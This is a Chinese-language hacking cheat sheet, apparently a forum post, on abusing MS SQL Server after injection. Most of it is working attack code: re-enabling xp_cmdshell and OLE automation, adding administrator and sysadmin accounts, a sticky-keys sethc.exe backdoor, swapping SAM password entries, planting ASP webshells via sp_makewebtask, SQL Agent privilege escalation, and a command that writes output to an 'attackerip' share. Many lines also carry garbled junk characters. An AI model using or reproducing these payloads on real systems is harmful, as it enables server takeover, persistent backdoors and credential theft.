XP_CMDSHELL恢复方法大全

admin

1 未能找到存储过程'master..xpcmdshell'.  EXEC master.dbo.sp_addextendedproc 后用下面的三种方法,在注入点上执行加个空格和;号
恢复方法：查询分离器连接后,
: P! D- [( I9 q3 p$ z$ l5 t第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
/ F* L1 p3 ~; V2 b! m# Q. J  J第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
然后按F5键命令执行完毕

8 _  q/ O! {$ E4 z& b/ M! s2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126（找不到指定模块。）
" }" d6 w4 A1 I恢复方法：查询分离器连接后,
第一步执行：EXEC master.dbo.sp_dropextendedproc "xp_cmdshell"
第二步执行：EXEC master.dbo.sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
5 @2 F* `& O8 {& I" t然后按F5键命令执行完毕
# C" U0 k9 E: r! k7 |
0 A0 w* N) e2 M3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
恢复方法：查询分离器连接后,
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'      
然后按F5键命令执行完毕

# q. b. F; L6 I2 M; U4 终极方法.
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
, N0 o* @; @, l" V查询分离器连接后,
* Q* E3 t$ ^8 ?& `5 p" l, B2000servser系统:
! s$ t8 y4 E# Cdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 新用户 密码 /add'
* I# q  s' Z$ q/ w- d4 Y
/ ^+ H% }1 i4 ?declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 新用户 /add'
! ]* z$ z- c$ N/ c- N" Z
+ Z. f0 T. m: |4 H- `xp或2003server系统:

4 _7 V8 d4 V& k2 Ydeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 新用户 密码 /add'
; H! q* H5 ^; k( W, z
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 新用户 /add'

$ D, b; M+ u, _2 [
% g' f8 M- u- R0 _! w) m五个SHIFT
declare @o int exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'copyfile',null,'c:\windows\explorer.exe' ,'c:\windows\system32\sethc.exe';
; R! V6 b" W6 a$ M# U  z  c) D
7 E; i" X6 `% B0 odeclare @oo int exec sp_oacreate 'scripting.filesystemobject', @oo out exec sp_oamethod @oo, 'copyfile',null,'c:\windows\system32\sethc.exe' ,'c:\windows\system32\dllcache\sethc.exe';

xp_cmdshell执行命令另一种方法
declare @a sysname set @a='xp_'+'cmdshell' exec @a 'net user refdom 123456 /add'
8 g% d8 L% g5 O: l
; U. O2 _6 s2 G7 l- f9 C判断存储扩展是否存在
Select count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell'
返回结果为1就OK
8 v5 g# n6 o7 h# q5 v/ Y

% O, C* T" I9 O: o! s- o1 w& ^上传xplog70.dll恢复xp_cmdshell语句:
sp_addextendedproc xp_cmdshell,@dllname='E:\newche2\about\XPLOG70.DLL'
6 b6 l4 {% r! ~8 _1 B
) ^" x: I, U" t9 Y- z/ \, n8 U+ U0 C否则上传xplog7.0.dll
Exec master.dbo.addextendedproc 'xp_cmdshell','C:\WinNt\System32\xplog70.dll'
, ?2 F( }8 n3 d4 @
$ I' E4 |' {8 N
& t) E( d9 q+ O  v" b- j6 u4 E9 X
2 [, M" p2 K( f# ^% G) Y* m首先开启沙盘模式：
- Z9 c/ h1 b1 x2 f3 b# g- N; hexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
2 F1 Q5 Q% ?' }0 c' ?
7 k5 @! w: I4 p/ o0 B; }然后利用jet.oledb执行系统命令
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')
5 i. @) A2 _4 G6 k- q返回 不能找到c:\windows\system32\ias\ias.mdb错误,用exec master..xp_dirtree 'c:\windows\system32\ias\ias',1,1--  发现c:\windows\system32\ias\ias.mdb没了,应该是被管理员删掉了,还有另一个mdb也没了


; R. @5 I6 I4 r
, W; t1 d/ k) c恢复过程sp_addextendedproc 如下：
! c% E: n% d* |) l2 M$ Screate procedure sp_addextendedproc --- 1996/08/30 20:13
5 h1 X" @- m# U$ F! P8 w  [) d@functname nvarchar(517),/* (owner.)name of function to call */
@dllname varchar(255)/* name of DLL containing function */
as
3 U, \4 @: ?7 h& V! _( M' `set implicit_transactions off
1 B, M4 g* z; |9 b, Y  Tif @@trancount > 0
* S/ [: I! s' D* j: jbegin
0 _1 a" X# b( O. R3 J" braiserror(15002,-1,-1,'sp_addextendedproc')
+ Y1 E' f) h- u: e1 W5 Xreturn (1)
end
  f+ b- a! K# gdbcc addextendedproc( @functname, @dllname)
0 e( O+ _& S2 X8 X+ D) ]3 t) y8 n9 Hreturn (0) -- sp_addextendedproc
6 u9 W) W- ^: `- q2 IGO
3 f: Y2 t- x* ]) H9 v6 A0 ?- A


导出管理员密码文件
sa默认可以读sam键.应该。
reg export HKLM\SAM\SAM\Domains\Account\Users\000001F4 c:\old.reg
1 v0 X7 p1 W/ Z" @7 K3 M* M" qnet user administrator test
( l6 h+ q$ G  [) S) `7 g7 f用administrator登陆.
( r# u* d+ R: _用完机器后
reg import c:\test.reg
根本不用克隆.
找到对应的sid.
6 R) Q5 G, }' J3 w


恢复所有存储过程
/ X, x# j2 R  U5 Zuse master
exec sp_addextendedproc xp_enumgroups,'xplog70.dll'
exec sp_addextendedproc xp_fixeddrives,'xpstar.dll'
exec sp_addextendedproc xp_loginconfig,'xplog70.dll'
exec sp_addextendedproc xp_enumerrorlogs,'xpstar.dll'
# i3 n5 b5 C8 _% ]$ Iexec sp_addextendedproc xp_getfiledetails,'xpstar.dll'
$ d1 @; O+ Q! Mexec sp_addextendedproc sp_OACreate,'odsole70.dll'
exec sp_addextendedproc sp_OADestroy,'odsole70.dll'
exec sp_addextendedproc sp_OAGetErrorInfo,'odsole70.dll'
exec sp_addextendedproc sp_OAGetProperty,'odsole70.dll'
! c& t; R/ Z2 ^6 uexec sp_addextendedproc sp_OAMethod,'odsole70.dll'
exec sp_addextendedproc sp_OASetProperty,'odsole70.dll'
* Q8 R! g" |2 E4 h2 b+ Y) N, Xexec sp_addextendedproc sp_OAStop,'odsole70.dll'
  S2 i# t* I% d. D+ ^! i+ C! Kexec sp_addextendedproc xp_regaddmultistring,'xpstar.dll'
exec sp_addextendedproc xp_regdeletekey,'xpstar.dll'
, y. n! G' ]2 W# V! Zexec sp_addextendedproc xp_regdeletevalue,'xpstar.dll'
. [4 z. }4 Q2 Rexec sp_addextendedproc xp_regenumvalues,'xpstar.dll'
  Q8 Z  @! Y7 D* w" X) Sexec sp_addextendedproc xp_regread,'xpstar.dll'
exec sp_addextendedproc xp_regremovemultistring,'xpstar.dll'
exec sp_addextendedproc xp_regwrite,'xpstar.dll'
1 m# J0 t, S0 [! v3 Cexec sp_addextendedproc xp_availablemedia,'xpstar.dll'
% U; k1 K% r) S7 W

建立读文件的存储过程
$ u- w4 k- k2 u- }2 qCreate proc sp_readTextFile @filename sysname
7 c* c( ^3 X' i& S$ Uas

    begin
) y$ |) k: k( |* X7 e( n6 F" ]$ `7 W    set nocount on
    Create table #tempfile (line varchar(8000))
    exec ('bulk insert #tempfile from "' + @filename + '"')
4 b6 A- ~( j, f) ^* v    select * from #tempfile
    drop table #tempfile
$ x  Q; K& Q/ V) y' r) ~End

exec sp_readTextFile 'D:\testjun17\Teleweb-Japan\default.asp' 利用建立的存储过程读文件
查看登录用户
1 K- D6 E, v/ E8 QSelect * from sysxlogins
9 @0 f( `. n; v" }' @
把文件内容读取到表中
2 ~, `+ O, s- [2 H( K8 A3 }% M  \BULK INSERT tmp from "c:\test.txt"
. \) t9 N& w2 u9 ?dElete from 表名 清理表里的内容
create table b_test(fn nvarchar(4000));建一个表,字段为fn


加sa用户
" Y3 M3 X  @; mexec master.dbo.sp_addlogin user,pass;
exec master.dbo.sp_addsrvrolemember user,sysadmin

# \& m7 }: J- ^" U+ v6 k8 `

& Q! J- a, O4 @- C; \5 z. e- V; p读文件代码
declare @o int, @f int, @t int, @ret int
declare @line varchar(8000)
! t! ?$ u; D9 z) M/ _5 yexec sp_oacreate 'scripting.filesystemobject', @o out
6 q7 X* _5 R7 }. A- U9 v" Qexec sp_oamethod @o, 'opentextfile', @f out, '文件名', 1
" N1 j$ ~% X# N0 c/ P' V3 M+ Y* |exec @ret = sp_oamethod @f, 'readline', @line out
while( @ret = 0 )
- e9 d* O% V' c/ R: N! q% A( W( ebegin
print @line
% {6 o8 A/ k/ e/ R- ?6 Qexec @ret = sp_oamethod @f, 'readline', @line out
end
1 p. m) j8 {$ h

写文件代码：
declare @o int, @f int, @t int, @ret int
6 T- ?1 ?2 t  k3 h8 U0 fexec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'createtextfile', @f out, 'd:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini', 1
' Q5 ?( }( k- G# K) Y& ~; vexec @ret = sp_oamethod @f, 'writeline', NULL, 《内容》


% L, {: _1 a9 V添加lake2 shell
  p0 Q# |3 Q! a9 B: ]sp_addextendedproc 'xp_lake2', 'c:\recycler\xplake2.dll'
sp_dropextendedproc xp_lake2
EXEC xp_lake2 'net user'


: ]1 a5 u  D9 {. d4 R: ^' R8 {: l得到硬盘文件信息
: _- N: u, L+ J. x8 O--参数说明:目录名,目录深度,是否显示文件
: c5 t; z" }5 W0 qexecute master..xp_dirtree 'c:'
+ ]# b; |, t- K3 [execute master..xp_dirtree 'c:',1
execute master..xp_dirtree 'c:',1,1
7 n1 E0 _# C4 c7 p( i

读serv-u配置信息
+ B$ I6 j) x  h+ i2 I! N! |exec sp_readTextFile 'd:\Program Files\RhinoSoft.com\Serv-U\ReadMe.txt'
exec sp_readTextFile 'd:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini'

  Y6 }1 l2 {+ d8 I2 f, d  `通过xp_regwrite写SHIFT后门
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','debugger','REG_sz','c:\windows\system32\cmd.exe on';--
$ U- c( U+ O# m  z


找到web路径然后用exec master.dbo.xp_subdirs 'd:\web\www.xx.com';
exec sp_makewebtask 'd:\web\www.XXXX.com\XX.asp','select''<%execute(request("SB"))%>'' '备 份一个小马就可以了
5 g6 P- D6 d$ z
EXECUTE sp_makewebtask @outputfile = ‘WEB绝对路径\导出的文件名.asp',@query = 'SELECT 你的字段 FROM 你建的临时表'
- W/ S$ p" N4 J

$ N2 G1 M& V$ x# n/ s0 ~
sql server 2005下开启xp_cmdshell的办法
. Z! a! n% t( l2 e. z) u4 S
) r+ `. f( [6 ^EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;
* W) {- P8 N, T; P0 H
: s1 V# e6 [1 t' q2 \SQL2005开启'OPENROWSET'支持的方法：
5 F5 o' M! C: ^
exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE;

+ ?# \2 c5 _: [2 _1 mSQL2005开启'sp_oacreate'支持的方法:

. _3 [7 P" Y% [" U2 a/ w& }4 V  G& Lexec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE;
* P  R% T1 {0 G# O
% L6 U0 A2 V8 v8 b3 W% l
; O; f- X" U' E# ?


" d( k9 I+ c, D% r3 ~
) P: d1 s6 B1 F& B( \

& q- l7 A& b9 u
" m; |. s& y+ M# v- T
, }: ], ~# x* ^  Q. B
/ N0 w4 l0 D5 P1 w

, X3 V5 D1 u6 s
7 Z3 z8 X& F/ O( C3 w
) N* a* M( ]  |; A7 w1 K2 R
) M( r5 A' X4 b. `: i5 v0 R





4 ^7 e9 e5 ^& ^/ [, O
% N% G0 ~! R; U: J) m2 f2 X, u
以下方面不知道能不能成功暂且留下研究哈:
4)
use msdb; --这儿不要是master哟
! u# G1 Z9 r0 mexec sp_add_job @job_name= czy82 ;
exec sp_add_jobstep @job_name= czy82 ,@step_name = Exec my sql ,@subsystem= CMDEXEC ,@command= dir c:\>c:\b.txt ;
exec sp_add_jobserver @job_name = czy82 ,@server_name = smscomputer ;
$ k+ G2 g5 O% A) b4 X  P' E9 l7 Zexec sp_start_job @job_name= czy82 ;
4 x) [+ O' R# A; s& H; n4 `
利用MSSQL的作业处理也是可以执行命令的而且如果上面的subsystem的参数是tsql，后面的我们就可以
+ A' O* r+ @0 \+ Q执行tsql语句了.
. |" g0 h4 z+ W# o3 H( R对于这几个储存过程的使用第一在@server_name我们要指定你的sql的服务器名
第二系统的sqlserveragent服务必须打开(默认没打开的气人了吧)
net start SQLSERVERAGENT
4 B5 P  ]) K4 H
- [9 B3 W; E& z& X对于这个东东还有一个地方不同就是public也可以执行..同这儿也是有系统洞洞的看下面的
USE msdb
EXEC sp_add_job @job_name = GetSystemOnSQL ,
5 P' P+ P& I' ]! e) @@enabled = 1,
@description = This will give a low privileged user access to
xp_cmdshell ,
0 q2 b* Y9 _# {7 `5 m% p) u! L) {) d@delete_level = 1
EXEC sp_add_jobstep @job_name = GetSystemOnSQL ,
@step_name = Exec my sql ,
@subsystem = TSQL ,
+ R$ b( d1 T/ f; }. ?' r" ~, n0 Q$ M@command = exec master..xp_execresultset N select exec
master..xp_cmdshell "dir > c:\agent-job-results.txt" ,N Master
8 _* w1 K; \2 {6 u5 B! l8 S( REXEC sp_add_jobserver @job_name = GetSystemOnSQL ,
@server_name = 你的SQL的服务器名
: k, J+ P9 j% O" c9 m1 _EXEC sp_start_job @job_name = GetSystemOnSQL

6 ~1 y* O+ m0 V; \/ M- I. m5 E; X不要怀疑上面的代码，我是测试成功了的!这儿我们要注意xp_execresultset就是因为它所以
才让我们可以以public执行xp_cmdshell

( Q$ i; r" @2 o5 u. y6 ?9 W( D2 }5)关于Microsoft SQL Agent Jobs任意文件可删除覆盖漏洞(public用户也可以)
6 p0 Q5 N  g$ C2 B在安焦有文章:http://www.xfocus.net/vuln/vul_view.php?vul_id=2968

USE msdb
0 }! U6 t# x. o! p% o- [& |1 SEXEC sp_add_job @job_name = ArbitraryFilecreate ,
8 X" f% M6 ?- j@enabled = 1,
0 e) m6 @. f2 k@description = This will create a file called c:\sqlafc123.txt ,
) F4 n1 ^/ T, Y@delete_level = 1
" i( O% U: F4 w: k7 I) }/ XEXEC sp_add_jobstep @job_name = ArbitraryFilecreate ,
( z5 f: p( E7 Z  g- l/ L  @3 S@step_name = SQLAFC ,
@subsystem = TSQL ,
@command = select hello, this file was created by the SQL Agent. ,
: f1 C; Y: O$ o) L. \+ O+ u@output_file_name = c:\sqlafc123.txt
1 R: ?- E* @& Q5 e5 e6 o1 C( _$ REXEC sp_add_jobserver @job_name = ArbitraryFilecreate ,
@server_name = SERVER_NAME
EXEC sp_start_job @job_name = ArbitraryFilecreate

4 p8 }) e! X+ Z5 B* k8 M如果subsystem选的是:tsql，在生成的文件的头部有如下内容

??揂rbitraryFilecreate? ? 1 ?,揝QLAFC? ???? 2003-02-07 18:24:19
5 d4 j( p; s" |" _* P1 h----------------------------------------------
hello, this file was created by the SQL Agent.
$ K; G7 O4 E  ]% G
(1 ?????)
4 \; J4 n, `  _( T5 C
$ G8 i* L. x/ t+ Q, t6 a9 w! B5 ^所以我建议要生成文件最好subsystem选cmdexec,如果利用得好我们可以写一个有添加管理员
命令的vbs文件到启动目录!
, u7 `5 C2 r! l: Z. Y
6)关于sp_makewebtask(可以写任意内容任意文件名的文件)
关于sp_MScopyscriptfile 看下面的例子
declare @command varchar(100)
0 z* E2 }  R  L( S  e* T# Q7 }declare @scripfile varchar(200)
2 v  E, b# x( |3 W2 {! Iset concat_null_yields_null off
select @command= dir c:\ > "\\attackerip\share\dir.txt"
select @scripfile= c:\autoexec.bat > nul" | @command | rd "
7 g7 h7 Q( z& H2 t8 S% Cexec sp_MScopyscriptfile @scripfile ,

6 m$ y* z! H& K+ a7 d3 _8 g这两个东东都还在测试试哟
让MSSQL的public用户得到一个本机的web shell

: z5 g" X& u/ M$ y* L4 Y6 zsp_makewebtask @outputfile= d:\sms\a.asp ,@charset=gb2312,
% y( r$ \9 C- ~3 ^; y/ ^& J; D: n--@query= select <img src=vbscript:msgbox(now())>
--@query= select <%response.write request.servervariables("APPL_PHYSICAL_PATH")%>
@query= select
) \2 D4 Q1 n" r  I/ M( W8 v' |# b<%On Error Resume Next
Set oscript = Server.createObject("wscript.SHELL")
Set oscriptNet = Server.createObject("wscript.NETWORK")
Set oFileSys = Server.createObject("scripting.FileSystemObject")
szCMD = Request.Form(".CMD")
$ [' v' {, K% a; |9 OIf (szCMD <>"")Then
7 G, B4 X. j% iszTempFile = "C:\" & oFileSys.GetTempName()
* O! D3 Q5 r9 SCall oscript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
Set oFile = oFilesys.OpenTextFile (szTempFile, 1, False, 0)
( q* ~- |/ s9 X/ a; p9 P( o- [End If %>
<HTML><BODY><FORM action="<%= Request.ServerVariables("URL")%>" method="OST">
<input type=text name=".CMD" size=45 value="<%= szCMD %>"><input type=submit value="Run">
</FORM><RE>
% `  E4 n0 x/ ^# [2 P; B$ H- C. V# b<% If (IsObject(oFile))Then
On Error Resume Next
Response.Write Server.HTMLEncode(oFile.ReadAll)
oFile.Close
; v  m# I. M2 lCall oFileSys.deleteFile(szTempFile, True)
) _9 Y5 O$ _6 _0 _; ]: m+ X& o! V% a/ wEnd If%>
</BODY></HTML>
3 I/ L0 U! f8 ]* Q